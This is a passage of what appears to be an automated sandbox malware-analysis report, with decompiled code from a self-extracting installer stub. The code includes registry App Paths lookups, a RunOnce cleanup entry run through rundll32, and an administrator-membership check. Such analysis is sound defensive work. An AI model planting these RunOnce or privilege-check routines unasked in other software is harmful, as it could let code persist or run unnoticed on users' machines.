                                                • CharPrevA.USER32(010688C0,00000000,?,00000001), ref: 010642D6
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01064391
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010643A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                • API String ID: 1865808269-1731843650
                                                • Opcode ID: 0df433236e1b446634dc7cae68f5bb0b68d4a3209808aa841606e4a66523ba73
                                                • Instruction ID: 9c523f4e19cd190ca31a8bdb6a25d99e64e8c57b4dae61f98bcd86d2a34550e1
                                                • Opcode Fuzzy Hash: 0df433236e1b446634dc7cae68f5bb0b68d4a3209808aa841606e4a66523ba73
                                                • Instruction Fuzzy Hash: 80410BB4A00315EFE721AF78E8849AE7FBCEB45344F04819AEAC1E7255CB798841C770
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E01062773(CHAR* __ecx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v269;
                                                				CHAR* _v276;
                                                				int _v280;
                                                				void* _v284;
                                                				int _v288;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr _t34;
                                                				int _t45;
                                                				int* _t50;
                                                				CHAR* _t52;
                                                				CHAR* _t61;
                                                				char* _t62;
                                                				int _t63;
                                                				CHAR* _t64;
                                                				signed int _t65;
                                                
                                                				_t52 = __ecx;
                                                				_t23 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t23 ^ _t65;
                                                				_t62 = _a4;
                                                				_t50 = 0;
                                                				_t61 = __ecx;
                                                				_v276 = _t62;
                                                				 *((char*)(__ecx)) = 0;
                                                				if( *_t62 != 0x23) {
                                                					_t63 = 0x104;
                                                					goto L14;
                                                				} else {
                                                					_t64 = _t62 + 1;
                                                					_v269 = CharUpperA( *_t64);
                                                					_v276 = CharNextA(CharNextA(_t64));
                                                					_t63 = 0x104;
                                                					_t34 = _v269;
                                                					if(_t34 == 0x53) {
                                                						L14:
                                                						GetSystemDirectoryA(_t61, _t63);
                                                						goto L15;
                                                					} else {
                                                						if(_t34 == 0x57) {
                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                							goto L16;
                                                						} else {
                                                							_push(_t52);
                                                							_v288 = 0x104;
                                                							E01061781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                							_t59 = 0x104;
                                                							E0106658A( &_v268, 0x104, _v276);
                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                								L16:
                                                								_t59 = _t63;
                                                								E0106658A(_t61, _t63, _v276);
                                                							} else {
                                                								if(RegQueryValueExA(_v284, 0x1061140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                									_t45 = _v280;
                                                									if(_t45 != 2) {
                                                										L9:
                                                										if(_t45 == 1) {
                                                											goto L10;
                                                										}
                                                									} else {
                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                											_t45 = _v280;
                                                											goto L9;
                                                										} else {
                                                											_t59 = 0x104;
                                                											E01061680(_t61, 0x104,  &_v268);
                                                											L10:
                                                											_t50 = 1;
                                                										}
                                                									}
                                                								}
                                                								RegCloseKey(_v284);
                                                								L15:
                                                								if(_t50 == 0) {
                                                									goto L16;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E01066CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                			}























                                                0x01062773
                                                0x0106277e
                                                0x01062785
                                                0x0106278a
                                                0x0106278d
                                                0x01062790
                                                0x01062792
                                                0x01062798
                                                0x0106279d
                                                0x010628b2
                                                0x00000000
                                                0x010627a3
                                                0x010627a3
                                                0x010627af
                                                0x010627c2
                                                0x010627c8
                                                0x010627cd
                                                0x010627d5
                                                0x010628b7
                                                0x010628b9
                                                0x00000000
                                                0x010627db
                                                0x010627dd
                                                0x010628aa
                                                0x00000000
                                                0x010627e3
                                                0x010627e3
                                                0x010627ec
                                                0x010627f8
                                                0x01062803
                                                0x0106280b
                                                0x01062831
                                                0x010628c3
                                                0x010628c9
                                                0x010628cd
                                                0x01062837
                                                0x0106285a
                                                0x0106285c
                                                0x01062865
                                                0x01062892
                                                0x01062895
                                                0x00000000
                                                0x00000000
                                                0x01062867
                                                0x01062878
                                                0x0106288c
                                                0x00000000
                                                0x0106287a
                                                0x01062880
                                                0x01062885
                                                0x01062897
                                                0x01062899
                                                0x01062899
                                                0x01062878
                                                0x01062865
                                                0x010628a0
                                                0x010628bf
                                                0x010628c1
                                                0x00000000
                                                0x00000000
                                                0x010628c1
                                                0x01062831
                                                0x010627dd
                                                0x010627d5
                                                0x010628e5

                                                APIs
                                                • CharUpperA.USER32(19E58FB5,00000000,00000000,00000000), ref: 010627A8
                                                • CharNextA.USER32(0000054D), ref: 010627B5
                                                • CharNextA.USER32(00000000), ref: 010627BC
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062829
                                                • RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062852
                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062870
                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010628A0
                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010628AA
                                                • GetSystemDirectoryA.KERNEL32 ref: 010628B9
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010627E4
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                • API String ID: 2659952014-2428544900
                                                • Opcode ID: f68cb392465411621b6480c431b0a47bec1a67e3613fecc8ad205bcfaee4ff38
                                                • Instruction ID: 749b075cdc48fd526b8fbd831a20fd2af037d82c732840184c821499db8045c5
                                                • Opcode Fuzzy Hash: f68cb392465411621b6480c431b0a47bec1a67e3613fecc8ad205bcfaee4ff38
                                                • Instruction Fuzzy Hash: 1541B070E01128AFEB659B689C85AFA7BBCEF55700F0040E9F5C9E3104CB758E818FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E01062267() {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v836;
                                                				void* _v840;
                                                				int _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				intOrPtr _t33;
                                                				void* _t38;
                                                				intOrPtr* _t42;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				signed int _t51;
                                                
                                                				_t19 =  *0x1068004; // 0x19e58fb5
                                                				_t20 = _t19 ^ _t51;
                                                				_v8 = _t19 ^ _t51;
                                                				if( *0x1068530 != 0) {
                                                					_push(_t49);
                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                						_push(_t38);
                                                						_v844 = 0x238;
                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                							_push(_t47);
                                                							memset( &_v268, 0, 0x104);
                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                								E0106658A( &_v268, 0x104, 0x1061140);
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                							E0106171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                							_t42 =  &_v836;
                                                							_t45 = _t42 + 1;
                                                							_pop(_t47);
                                                							do {
                                                								_t33 =  *_t42;
                                                								_t42 = _t42 + 1;
                                                							} while (_t33 != 0);
                                                							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                						}
                                                						_t20 = RegCloseKey(_v840);
                                                						_pop(_t38);
                                                					}
                                                					_pop(_t49);
                                                				}
                                                				return E01066CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                			}



















                                                0x01062272
                                                0x01062277
                                                0x01062279
                                                0x01062283
                                                0x01062289
                                                0x010622ab
                                                0x010622b1
                                                0x010622c4
                                                0x010622e0
                                                0x010622e6
                                                0x010622f5
                                                0x0106230d
                                                0x0106231c
                                                0x0106231c
                                                0x01062321
                                                0x0106233a
                                                0x01062342
                                                0x01062348
                                                0x0106234b
                                                0x0106234c
                                                0x0106234c
                                                0x0106234e
                                                0x0106234f
                                                0x0106236e
                                                0x0106236e
                                                0x0106237a
                                                0x01062380
                                                0x01062380
                                                0x01062381
                                                0x01062381
                                                0x0106238f

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010622A3
                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010622D8
                                                • memset.MSVCRT ref: 010622F5
                                                • GetSystemDirectoryA.KERNEL32 ref: 01062305
                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0106236E
                                                • RegCloseKey.ADVAPI32(?), ref: 0106237A
                                                Strings
                                                • wextract_cleanup1, xrefs: 0106227C, 010622CD, 01062363
                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01062299
                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01062321
                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0106232D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                • API String ID: 3027380567-1226499438
                                                • Opcode ID: 149c13d4e5ed86fde65ae8889648a964371cb8144c9c90388f4da1fb4b416ba1
                                                • Instruction ID: ab5de5da548430224b209d4261397f56b3ae915c04d812f60e3041228e2873f7
                                                • Opcode Fuzzy Hash: 149c13d4e5ed86fde65ae8889648a964371cb8144c9c90388f4da1fb4b416ba1
                                                • Instruction Fuzzy Hash: 5631C871A00228ABDB719B55DC49FEA7BBCEB54740F0001EAF58DAA010EB75AB84CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E01063100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t15;
                                                				struct HWND__* _t16;
                                                				struct HWND__* _t33;
                                                				struct HWND__* _t34;
                                                
                                                				_t8 = _a8 - 0xf;
                                                				if(_t8 == 0) {
                                                					if( *0x1068590 == 0) {
                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                						 *0x1068590 = 1;
                                                					}
                                                					L13:
                                                					return 0;
                                                				}
                                                				_t11 = _t8 - 1;
                                                				if(_t11 == 0) {
                                                					L7:
                                                					_push(0);
                                                					L8:
                                                					EndDialog(_a4, ??);
                                                					L9:
                                                					return 1;
                                                				}
                                                				_t15 = _t11 - 0x100;
                                                				if(_t15 == 0) {
                                                					_t16 = GetDesktopWindow();
                                                					_t33 = _a4;
                                                					E010643D0(_t33, _t16);
                                                					SetDlgItemTextA(_t33, 0x834,  *0x1068d4c);
                                                					SetWindowTextA(_t33, "lega");
                                                					SetForegroundWindow(_t33);
                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                					 *0x10688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                					SetWindowLongA(_t34, 0xfffffffc, E010630C0);
                                                					return 1;
                                                				}
                                                				if(_t15 != 1) {
                                                					goto L13;
                                                				}
                                                				if(_a12 != 6) {
                                                					if(_a12 != 7) {
                                                						goto L9;
                                                					}
                                                					goto L7;
                                                				}
                                                				_push(1);
                                                				goto L8;
                                                			}









                                                0x01063108
                                                0x0106310b
                                                0x010631b7
                                                0x010631ca
                                                0x010631d0
                                                0x010631d0
                                                0x010631da
                                                0x00000000
                                                0x010631da
                                                0x01063111
                                                0x01063114
                                                0x01063136
                                                0x01063136
                                                0x01063138
                                                0x0106313b
                                                0x01063141
                                                0x00000000
                                                0x01063143
                                                0x01063116
                                                0x0106311b
                                                0x0106314b
                                                0x01063151
                                                0x01063158
                                                0x0106316a
                                                0x01063176
                                                0x0106317d
                                                0x0106318b
                                                0x0106319e
                                                0x010631a3
                                                0x00000000
                                                0x010631ad
                                                0x01063120
                                                0x00000000
                                                0x00000000
                                                0x0106312a
                                                0x01063134
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063134
                                                0x0106312c
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,00000000), ref: 0106313B
                                                • GetDesktopWindow.USER32 ref: 0106314B
                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0106316A
                                                • SetWindowTextA.USER32(?,lega), ref: 01063176
                                                • SetForegroundWindow.USER32(?), ref: 0106317D
                                                • GetDlgItem.USER32(?,00000834), ref: 01063185
                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 01063190
                                                • SetWindowLongA.USER32(00000000,000000FC,010630C0), ref: 010631A3
                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010631CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                • String ID: lega
                                                • API String ID: 3785188418-245445314
                                                • Opcode ID: 54a39c8eba512c4e72b5ec399847ed2948ce3a4deba10b1c6a10dfd75fef4a97
                                                • Instruction ID: 29029ce4af6add22c489c3a99560cff898ae4cf6c60318b0521957efc013ed2d
                                                • Opcode Fuzzy Hash: 54a39c8eba512c4e72b5ec399847ed2948ce3a4deba10b1c6a10dfd75fef4a97
                                                • Instruction Fuzzy Hash: 4811B431644262FFEB316F289C0CB5A3AB8FB46760F004611F9D9EE1A5DB7A9541C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E010618A3(void* __edx, void* __esi) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				char _v20;
                                                				long _v24;
                                                				void* _v28;
                                                				void* _v32;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t23;
                                                				long _t45;
                                                				void* _t49;
                                                				int _t50;
                                                				void* _t52;
                                                				signed int _t53;
                                                
                                                				_t51 = __esi;
                                                				_t49 = __edx;
                                                				_t23 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t23 ^ _t53;
                                                				_t25 =  *0x1068128; // 0x2
                                                				_t45 = 0;
                                                				_v12 = 0x500;
                                                				_t50 = 2;
                                                				_v16.Value = 0;
                                                				_v20 = 0;
                                                				if(_t25 != _t50) {
                                                					L20:
                                                					return E01066CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                				}
                                                				if(E010617EE( &_v20) != 0) {
                                                					_t25 = _v20;
                                                					if(_v20 != 0) {
                                                						 *0x1068128 = 1;
                                                					}
                                                					goto L20;
                                                				}
                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                					goto L20;
                                                				}
                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                					L17:
                                                					CloseHandle(_v28);
                                                					_t25 = _v20;
                                                					goto L20;
                                                				} else {
                                                					_push(__esi);
                                                					_t52 = LocalAlloc(0, _v24);
                                                					if(_t52 == 0) {
                                                						L16:
                                                						_pop(_t51);
                                                						goto L17;
                                                					}
                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                						L15:
                                                						LocalFree(_t52);
                                                						goto L16;
                                                					} else {
                                                						if( *_t52 <= 0) {
                                                							L14:
                                                							FreeSid(_v32);
                                                							goto L15;
                                                						}
                                                						_t15 = _t52 + 4; // 0x4
                                                						_t50 = _t15;
                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                							_t45 = _t45 + 1;
                                                							_t50 = _t50 + 8;
                                                							if(_t45 <  *_t52) {
                                                								continue;
                                                							}
                                                							goto L14;
                                                						}
                                                						 *0x1068128 = 1;
                                                						_v20 = 1;
                                                						goto L14;
                                                					}
                                                				}
                                                			}


















                                                0x010618a3
                                                0x010618a3
                                                0x010618ab
                                                0x010618b2
                                                0x010618b5
                                                0x010618be
                                                0x010618c0
                                                0x010618c6
                                                0x010618c7
                                                0x010618ca
                                                0x010618cf
                                                0x010619c9
                                                0x010619d8
                                                0x010619d8
                                                0x010618df
                                                0x010619b8
                                                0x010619bd
                                                0x010619bf
                                                0x010619bf
                                                0x00000000
                                                0x010619bd
                                                0x010618fa
                                                0x00000000
                                                0x00000000
                                                0x01061912
                                                0x010619aa
                                                0x010619ad
                                                0x010619b3
                                                0x00000000
                                                0x01061927
                                                0x01061927
                                                0x01061932
                                                0x01061936
                                                0x010619a9
                                                0x010619a9
                                                0x00000000
                                                0x010619a9
                                                0x0106194c
                                                0x010619a2
                                                0x010619a3
                                                0x00000000
                                                0x0106196e
                                                0x01061970
                                                0x01061999
                                                0x0106199c
                                                0x00000000
                                                0x0106199c
                                                0x01061972
                                                0x01061972
                                                0x01061975
                                                0x01061984
                                                0x01061985
                                                0x0106198a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106198c
                                                0x01061991
                                                0x01061996
                                                0x00000000
                                                0x01061996
                                                0x0106194c

                                                APIs
                                                  • Part of subcall function 010617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010618DD), ref: 0106181A
                                                  • Part of subcall function 010617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0106182C
                                                  • Part of subcall function 010617EE: AllocateAndInitializeSid.ADVAPI32(010618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010618DD), ref: 01061855
                                                  • Part of subcall function 010617EE: FreeSid.ADVAPI32(?,?,?,?,010618DD), ref: 01061883
                                                  • Part of subcall function 010617EE: FreeLibrary.KERNEL32(00000000,?,?,?,010618DD), ref: 0106188A
                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010618EB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010618F2
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0106190A
                                                • GetLastError.KERNEL32 ref: 01061918
                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0106192C
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01061944
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01061964
                                                • EqualSid.ADVAPI32(00000004,?), ref: 0106197A
                                                • FreeSid.ADVAPI32(?), ref: 0106199C
                                                • LocalFree.KERNEL32(00000000), ref: 010619A3
                                                • CloseHandle.KERNEL32(?), ref: 010619AD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                • String ID:
                                                • API String ID: 2168512254-0
                                                • Opcode ID: d484ae5ba00d5f1cc0f3937ae3f80409af32aa85fa9bddc91393857c51d13f44
                                                • Instruction ID: e69fdf2605a007c139731957d08a5672a89295f13b83088eec7a2dccd1fee311
                                                • Opcode Fuzzy Hash: d484ae5ba00d5f1cc0f3937ae3f80409af32aa85fa9bddc91393857c51d13f44
                                                • Instruction Fuzzy Hash: 94315E71A00209EFEB609FA5DC48ABFBBBCFF44304F104469F685E2154D7369904CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E0106468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                				long _t4;
                                                				void* _t11;
                                                				CHAR* _t14;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t14 = __ecx;
                                                				_t11 = __edx;
                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                				_t16 = _t4;
                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                					if(_t16 == 0) {
                                                						L5:
                                                						return 0;
                                                					}
                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                					FreeResource(_t15);
                                                					return _t16;
                                                				}
                                                				return _t4;
                                                			}








                                                0x01064699
                                                0x0106469b
                                                0x010646a9
                                                0x010646af
                                                0x010646b4
                                                0x010646bc
                                                0x010646f9
                                                0x00000000
                                                0x010646f9
                                                0x010646d9
                                                0x010646dd
                                                0x00000000
                                                0x00000000
                                                0x010646e5
                                                0x010646ef
                                                0x00000000
                                                0x010646f5
                                                0x010646ff

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                • SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                • LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                • LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                • memcpy_s.MSVCRT ref: 010646E5
                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                • String ID: TITLE$lega
                                                • API String ID: 3370778649-934471404
                                                • Opcode ID: 93b779d773b2db3dd69cbf253643d355593598219f0b783579f526bfca125354
                                                • Instruction ID: 40d4cdfea5a8f46f93ff2869bfed31c8bd0408b96b8968fb7276e57c7a58deec
                                                • Opcode Fuzzy Hash: 93b779d773b2db3dd69cbf253643d355593598219f0b783579f526bfca125354
                                                • Instruction Fuzzy Hash: AB016236344210FBF3702AA96C4DF6B7E6DEB89B61F040014FBC9E7154C9668C4587A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E010617EE(intOrPtr* __ecx) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				void* _v24;
                                                				intOrPtr* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t14;
                                                				_Unknown_base(*)()* _t20;
                                                				long _t28;
                                                				void* _t35;
                                                				struct HINSTANCE__* _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                
                                                				_t14 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t14 ^ _t38;
                                                				_v12 = 0x500;
                                                				_t37 = __ecx;
                                                				_v16.Value = 0;
                                                				_v28 = __ecx;
                                                				_t28 = 0;
                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                				if(_t36 != 0) {
                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                					_v20 = _t20;
                                                					if(_t20 != 0) {
                                                						 *_t37 = 0;
                                                						_t28 = 1;
                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                							_t37 = _t39;
                                                							 *0x106a288(0, _v24, _v28);
                                                							_v20();
                                                							if(_t39 != _t39) {
                                                								asm("int 0x29");
                                                							}
                                                							FreeSid(_v24);
                                                						}
                                                					}
                                                					FreeLibrary(_t36);
                                                				}
                                                				return E01066CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                			}



















                                                0x010617f6
                                                0x010617fd
                                                0x01061805
                                                0x0106180b
                                                0x0106180d
                                                0x01061815
                                                0x01061818
                                                0x01061820
                                                0x01061824
                                                0x0106182c
                                                0x01061832
                                                0x01061837
                                                0x01061851
                                                0x01061854
                                                0x0106185d
                                                0x01061862
                                                0x0106186c
                                                0x01061872
                                                0x01061877
                                                0x0106187e
                                                0x0106187e
                                                0x01061883
                                                0x01061883
                                                0x0106185d
                                                0x0106188a
                                                0x0106188a
                                                0x010618a2

                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010618DD), ref: 0106181A
                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0106182C
                                                • AllocateAndInitializeSid.ADVAPI32(010618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010618DD), ref: 01061855
                                                • FreeSid.ADVAPI32(?,?,?,?,010618DD), ref: 01061883
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,010618DD), ref: 0106188A
                                                Strings
                                                Memory Dump Source
